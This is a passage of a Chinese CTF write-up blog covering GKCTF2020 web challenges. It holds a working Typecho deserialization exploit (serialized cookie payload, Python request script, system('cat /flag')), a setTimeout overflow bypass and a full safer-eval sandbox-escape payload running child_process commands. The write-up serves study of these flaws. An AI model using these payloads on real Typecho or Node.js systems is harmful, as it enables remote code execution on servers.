class="string">&#x27;PHPSESSID=hhh;__typecho_config=YToyOntzOjc6ImFkYXB0ZXIiO086MTI6IlR5cGVjaG9fRmVlZCI6Mjp7czoxOToiAFR5cGVjaG9fRmVlZABfdHlwZSI7czo4OiJBVE9NIDEuMCI7czoyMDoiAFR5cGVjaG9fRmVlZABfaXRlbXMiO2E6MTp7aTowO2E6Mjp7czo4OiJjYXRlZ29yeSI7YToxOntpOjA7TzoxNToiVHlwZWNob19SZXF1ZXN0IjoyOntzOjI0OiIAVHlwZWNob19SZXF1ZXN0AF9wYXJhbXMiO2E6MTp7czoxMDoic2NyZWVuTmFtZSI7czo5OiJwaHBpbmZvKCkiO31zOjI0OiIAVHlwZWNob19SZXF1ZXN0AF9maWx0ZXIiO2E6MTp7aTowO3M6NjoiYXNzZXJ0Ijt9fX1zOjY6ImF1dGhvciI7TzoxNToiVHlwZWNob19SZXF1ZXN0IjoyOntzOjI0OiIAVHlwZWNob19SZXF1ZXN0AF9wYXJhbXMiO2E6MTp7czoxMDoic2NyZWVuTmFtZSI7czo5OiJwaHBpbmZvKCkiO31zOjI0OiIAVHlwZWNob19SZXF1ZXN0AF9maWx0ZXIiO2E6MTp7aTowO3M6NjoiYXNzZXJ0Ijt9fX19fXM6NjoicHJlZml4IjtzOjg6InR5cGVjaG9fIjt9&#x27;</span></span><br><span class="line">,<span class="string">&#x27;Referer&#x27;</span>:<span class="string">&#x27;http://f905337f-89e3-497a-9a74-a7e00c4a4171.node3.buuoj.cn/install.php&#x27;</span>&#125;</span><br><span class="line">r =requests.post(url,files=files,headers=headers,data=&#123;<span class="string">&#x27;PHP_SESSION_UPLOAD_PROGRESS&#x27;</span>:<span class="string">&#x27;hjnb&#x27;</span>&#125;)</span><br><span class="line">print(r.encoding) <span class="comment">#UTF-8</span></span><br><span class="line"><span class="comment">#print(r.text)</span></span><br><span class="line">f = open(<span class="string">&quot;test.html&quot;</span>, <span class="string">&quot;w&quot;</span>,encoding=<span class="string">&quot;UTF-8&quot;</span>)</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> r.text:</span><br><span class="line">    <span class="comment">#将数据写入文件</span></span><br><span class="line">    f.write(i)</span><br><span class="line">f.close()</span><br></pre></td></tr></table></figure>

<p>结果如下，成功执行phpinfo：</p>
<p><img src="https://kee1ongz.oss-cn-beijing.aliyuncs.com/img/image-20200814144136556.png" alt="image-20200814144136556"></p>
<p>接下来替换exp中的命令，将生成的payload替换cookie即可，就不单放了：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">system(&#39;ls &#x2F;&#39;);</span><br><span class="line">system(&#39;cat &#x2F;flag&#39;);</span><br></pre></td></tr></table></figure>

<p><img src="https://kee1ongz.oss-cn-beijing.aliyuncs.com/img/image-20200814144358885.png" alt="image-20200814144358885"></p>
<p><img src="https://kee1ongz.oss-cn-beijing.aliyuncs.com/img/image-20200814144541265.png" alt="image-20200814144541265"></p>
<h3 id="法2：另一处反序列化"><a href="#法2：另一处反序列化" class="headerlink" title="法2：另一处反序列化"></a>法2：另一处反序列化</h3><p>根据该漏洞的分析文章，利用点是在这一句上：</p>
<p><img src="https://kee1ongz.oss-cn-beijing.aliyuncs.com/img/image-20200814145036869.png" alt="image-20200814145036869"></p>
<p>也就是<code>Typecho_Cookie::get(&#39;__typecho_config&#39;))</code>是可以触发的条件。那么全局搜一下，发现在除了原有的触发点，还有一处：</p>
<p><img src="https://kee1ongz.oss-cn-beijing.aliyuncs.com/img/image-20200814145202026.png" alt="image-20200814145202026"></p>
<p>在284行，程序运行到这里的条件是须有GET参start，当然也需要Referer为本站。</p>
<p><img src="https://kee1ongz.oss-cn-beijing.aliyuncs.com/img/image-20200814145251445.png" alt="image-20200814145251445"></p>
<p><strong>除此之外没有任何其他限制条件</strong>。</p>
<p>那么如法炮制一下，给<code>install.php?start=lcz</code>POST一个包。包头Referer为本站，包的内容为上面生成的payload：</p>
<p><img src="https://kee1ongz.oss-cn-beijing.aliyuncs.com/img/image-20200814145639116.png" alt="image-20200814145639116"></p>
<p>成功抬走：</p>
<p><img src="https://kee1ongz.oss-cn-beijing.aliyuncs.com/img/image-20200814145650197.png" alt="image-20200814145650197"></p>
<p>汗颜……</p>
<h1 id="GKCTF2020-EZ三剑客-EzNode"><a href="#GKCTF2020-EZ三剑客-EzNode" class="headerlink" title="[GKCTF2020]EZ三剑客-EzNode"></a>[GKCTF2020]EZ三剑客-EzNode</h1><h2 id="考点：settimeout溢出-沙盒逃逸"><a href="#考点：settimeout溢出-沙盒逃逸" class="headerlink" title="考点：settimeout溢出+沙盒逃逸"></a>考点：settimeout溢出+沙盒逃逸</h2><p>一个Nodejs的题目，给了源码和所用库的版本。</p>
<p>一开始有个注释就很有趣：</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">const</span> express = <span class="built_in">require</span>(<span class="string">&#x27;express&#x27;</span>);</span><br><span class="line"><span class="keyword">const</span> bodyParser = <span class="built_in">require</span>(<span class="string">&#x27;body-parser&#x27;</span>);</span><br><span class="line"></span><br><span class="line"><span class="keyword">const</span> saferEval = <span class="built_in">require</span>(<span class="string">&#x27;safer-eval&#x27;</span>); <span class="comment">// 2019.7/WORKER1 找到一个很棒的库</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">const</span> fs = <span class="built_in">require</span>(<span class="string">&#x27;fs&#x27;</span>);</span><br><span class="line"></span><br><span class="line"><span class="keyword">const</span> app = express();</span><br></pre></td></tr></table></figure>

<p>那么根据给出的版本号，搜一下<code>safer-eval</code>这个库：</p>
<figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">&#123;</span><br><span class="line">  <span class="attr">&quot;name&quot;</span>: <span class="string">&quot;src&quot;</span>,</span><br><span class="line">  <span class="attr">&quot;version&quot;</span>: <span class="string">&quot;1.0.0&quot;</span>,</span><br><span class="line">  <span class="attr">&quot;main&quot;</span>: <span class="string">&quot;index.js&quot;</span>,</span><br><span class="line">  <span class="attr">&quot;license&quot;</span>: <span class="string">&quot;MIT&quot;</span>,</span><br><span class="line">  <span class="attr">&quot;dependencies&quot;</span>: &#123;</span><br><span class="line">    <span class="attr">&quot;body-parser&quot;</span>: <span class="string">&quot;1.19.0&quot;</span>,</span><br><span class="line">    <span class="attr">&quot;express&quot;</span>: <span class="string">&quot;4.17.1&quot;</span>,</span><br><span class="line">    <span class="attr">&quot;safer-eval&quot;</span>: <span class="string">&quot;1.3.6&quot;</span></span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>上snyk查一下，果然有发现：<a target="_blank" rel="noopener" href="https://snyk.io/vuln/search?q=safe-eval&amp;type=any">https://snyk.io/vuln/search?q=safe-eval&amp;type=any</a></p>
<p>有个全版本通杀的RCE：<a target="_blank" rel="noopener" href="https://snyk.io/vuln/SNYK-JS-SAFEREVAL-534901">https://snyk.io/vuln/SNYK-JS-SAFEREVAL-534901</a></p>
<p><img src="https://kee1ongz.oss-cn-beijing.aliyuncs.com/img/image-20200815095936218.png" alt="image-20200815095936218"></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">const theFunction &#x3D; function () &#123; const f &#x3D; Buffer.prototype.write; const ft &#x3D; &#123; length: 10, utf8Write()&#123; &#125; &#125;; function r(i)&#123; var x &#x3D; 0; try&#123; x &#x3D; r(i); &#125;catch(e)&#123;&#125; if(typeof(x)!&#x3D;&#x3D;&#39;number&#39;) return x; if(x!&#x3D;&#x3D;i) return x+1; try&#123; f.call(ft); &#125;catch(e)&#123; return e; &#125; return null; &#125; var i&#x3D;1; while(1)&#123; try&#123; i&#x3D;r(i).constructor.constructor(&quot;return process&quot;)(); break; &#125;catch(x)&#123; i++; &#125; &#125; return i.mainModule.require(&quot;child_process&quot;).execSync(&quot;id&quot;).toString() &#125;; const untrusted &#x3D; &#96;($&#123;theFunction&#125;)()&#96;; console.log(saferEval(untrusted));</span><br></pre></td></tr></table></figure>

<p>ok，接下来分析源码。</p>
<p>先来看第一个路由：</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 2020.1/WORKER2 老板说为了后期方便优化</span></span><br><span class="line">app.use(<span class="function">(<span class="params">req, res, next</span>) =&gt;</span> &#123;</span><br><span class="line">  <span class="keyword">if</span> (req.path === <span class="string">&#x27;/eval&#x27;</span>) &#123;</span><br><span class="line">    <span class="keyword">let</span> delay = <span class="number">60</span> * <span class="number">1000</span>;</span><br><span class="line">    <span class="built_in">console</span>.log(delay);</span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">Number</span>.isInteger(<span class="built_in">parseInt</span>(req.query.delay))) &#123;</span><br><span class="line">      delay = <span class="built_in">Math</span>.max(delay, <span class="built_in">parseInt</span>(req.query.delay));</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">const</span> t = <span class="built_in">setTimeout</span>(<span class="function">() =&gt;</span> next(), delay);</span><br><span class="line">    <span class="comment">// 2020.1/WORKER3 老板说让我优化一下速度，我就直接这样写了，其他人写了啥关我p事</span></span><br><span class="line">    <span class="built_in">setTimeout</span>(<span class="function">() =&gt;</span> &#123;</span><br><span class="line">      <span class="built_in">clearTimeout</span>(t);</span><br><span class="line">      <span class="built_in">console</span>.log(<span class="string">&#x27;timeout&#x27;</span>);</span><br><span class="line">      <span class="keyword">try</span> &#123;</span><br><span class="line">        res.send(<span class="string">&#x27;Timeout!&#x27;</span>);</span><br><span class="line">      &#125; <span class="keyword">catch</span> (e) &#123;</span><br><span class="line"></span><br><span class="line">      &#125;</span><br><span class="line">    &#125;, <span class="number">1000</span>);</span><br><span class="line">  &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">    next();</span><br><span class="line">  &#125;</span><br><span class="line">&#125;);</span><br></pre></td></tr></table></figure>

<p>Nodejs cxk水平，简单分析下。</p>
<p>在<code>/eval</code>这个路由下。首先先设置了delay的默认值。之后接受用户传一个名为delay的参数。传过去的值会和默认值比较，选较大的值设置为delay的值。之后将delay作为超时时限，若超时了就进到下一个路由。</p>
<p>按正常逻辑来说，这个delay的默认值除非在南极做题要不应该是超时不了的。我们传的delay如果比默认值小也没用。</p>
<p>那么bypass的话无非是两种思路，一种是传不同数据类型（类似于php中的数组绕过），一种就是让其上溢/下溢（例如php中的intval上下溢出）。</p>
<p>这里的关键是后者，setTimeout()存在上溢出。</p>
<p><a target="_blank" rel="noopener" href="https://juejin.im/post/6844903990077947912">https://juejin.im/post/6844903990077947912</a></p>
<p><img src="https://kee1ongz.oss-cn-beijing.aliyuncs.com/img/image-20200815104138963.png" alt="image-20200815104138963"></p>
<p>那么只要传<code>/eval?delay=2147483648</code>就可以直接跳转到<code>next()</code>，执行下一个路由。</p>
<p>下一个路由就是明示了，调用了<code>saferEval</code>，接受用户传一个名为e的值并作为其参数。这个就用到上面所述的RCE了。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">app.post(&#39;&#x2F;eval&#39;, function (req, res) &#123;</span><br><span class="line">  let response &#x3D; &#39;&#39;;</span><br><span class="line">  if (req.body.e) &#123;</span><br><span class="line">    try &#123;</span><br><span class="line">      response &#x3D; saferEval(req.body.e);</span><br><span class="line">    &#125; catch (e) &#123;</span><br><span class="line">      response &#x3D; &#39;Wrong Wrong Wrong!!!!&#39;;</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line">  res.send(String(response));</span><br><span class="line">&#125;);</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>这里将上面的poc改成IIFE形式（立即调用的函数表达式）来传参，即：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">(function () &#123;</span><br><span class="line">    statements</span><br><span class="line">&#125;)();</span><br></pre></td></tr></table></figure>

<p>那么改一下就是：</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line">(<span class="function"><span class="keyword">function</span> (<span class="params"></span>) </span>&#123;</span><br><span class="line">     <span class="keyword">const</span> f = Buffer.prototype.write;</span><br><span class="line">    <span class="keyword">const</span> ft = &#123;</span><br><span class="line">        length: <span class="number">10</span>,</span><br><span class="line">        utf8Write() &#123;&#125;</span><br><span class="line">    &#125;;</span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">r</span>(<span class="params">i</span>) </span>&#123;</span><br><span class="line">        <span class="keyword">var</span> x = <span class="number">0</span>;</span><br><span class="line">        <span class="keyword">try</span> &#123;</span><br><span class="line">            x = r(i);</span><br><span class="line">        &#125; <span class="keyword">catch</span>(e) &#123;&#125;</span><br><span class="line">        <span class="keyword">if</span> (<span class="keyword">typeof</span>(x) !== <span class="string">&#x27;number&#x27;</span>) <span class="keyword">return</span> x;</span><br><span class="line">        <span class="keyword">if</span> (x !== i) <span class="keyword">return</span> x + <span class="number">1</span>;</span><br><span class="line">        <span class="keyword">try</span> &#123;</span><br><span class="line">            f.call(ft);</span><br><span class="line">        &#125; <span class="keyword">catch</span>(e) &#123;</span><br><span class="line">            <span class="keyword">return</span> e;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">null</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">var</span> i = <span class="number">1</span>;</span><br><span class="line">    <span class="keyword">while</span> (<span class="number">1</span>) &#123;</span><br><span class="line">        <span class="keyword">try</span> &#123;</span><br><span class="line">            i = r(i).constructor.constructor(<span class="string">&quot;return process&quot;</span>)();</span><br><span class="line">            <span class="keyword">break</span>;</span><br><span class="line">        &#125; <span class="keyword">catch</span>(x) &#123;</span><br><span class="line">            i++;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> i.mainModule.require(<span class="string">&quot;child_process&quot;</span>).execSync(<span class="string">&quot;id&quot;</span>).toString()</span><br><span class="line">&#125;)()</span><br></pre></td></tr></table></figure>

<p>URL编码一下，带上delay传参，可以看到成功命令执行：</p>
<p><img src="https://kee1ongz.oss-cn-beijing.aliyuncs.com/img/image-20200815110450713.png" alt="image-20200815110450713"></p>
<p>那么接下来找flag就完事了，把payload的<code>execSync()</code>改为想要执行的命令即可：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ls &#x2F;</span><br></pre></td></tr></table></figure>

<p><img src="https://kee1ongz.oss-cn-beijing.aliyuncs.com/img/image-20200815110602828.png" alt="image-20200815110602828"></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cat &#x2F;flag</span><br></pre></td></tr></table></figure>

<p><img src="https://kee1ongz.oss-cn-beijing.aliyuncs.com/img/image-20200815110640730.png" alt="image-20200815110640730"></p>

      
    </div>
    <footer class="article-footer">
      <a data-url="https://kee1ong.github.io/2020/08/16/gkctf2/" data-id="ckdwz2qkr0000evfyat627nnd" class="article-share-link">Share</a>
      
      
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/GKCTF2020/" rel="tag">GKCTF2020</a></li></ul>

    </footer>
  </div>
  
    
<nav id="article-nav">
  
    <a href="/2020/08/16/dmsj1/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Newer</strong>
      <div class="article-nav-title">
        
          【代码审计】CTF中的代码审计题目应对策略（一）
        
      </div>
    </a>
  
  
    <a href="/2020/08/16/hello-world/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Older</strong>
      <div class="article-nav-title">Hello World</div>
    </a>
  
</nav>

  
</article>

</section>
        
          <aside id="sidebar">
  
    

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">标签</h3>
    <div class="widget">
      <ul class="tag-list" itemprop="keywords"><li class="tag-list-item"><a class="tag-list-link" href="/tags/GKCTF2020/" rel="tag">GKCTF2020</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/" rel="tag">代码审计</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">标签云</h3>
    <div class="widget tagcloud">
      <a href="/tags/GKCTF2020/" style="font-size: 10px;">GKCTF2020</a> <a href="/tags/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/" style="font-size: 10px;">代码审计</a>
    </div>
  </div>

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">归档</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/08/">八月 2020</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">最新文章</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2020/08/16/dmsj1/">【代码审计】CTF中的代码审计题目应对策略（一）</a>
          </li>
        
          <li>
            <a href="/2020/08/16/gkctf2/">【GKCTF2020】Web部分Writeup——PartII</a>
          </li>
        
          <li>
            <a href="/2020/08/16/hello-world/">Hello World</a>
          </li>
        
      </ul>
    </div>
  </div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      &copy; 2020 Kee1ongZ<br>
      Powered by <a href="http://hexo.io/" target="_blank">Hexo</a>
    </div>
  </div>
</footer>
    </div>
    <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
</nav>
    

<script src="//ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js"></script>


  
<link rel="stylesheet" href="/fancybox/jquery.fancybox.css">

  
<script src="/fancybox/jquery.fancybox.pack.js"></script>




<script src="/js/script.js"></script>




  </div>
</body>
</html>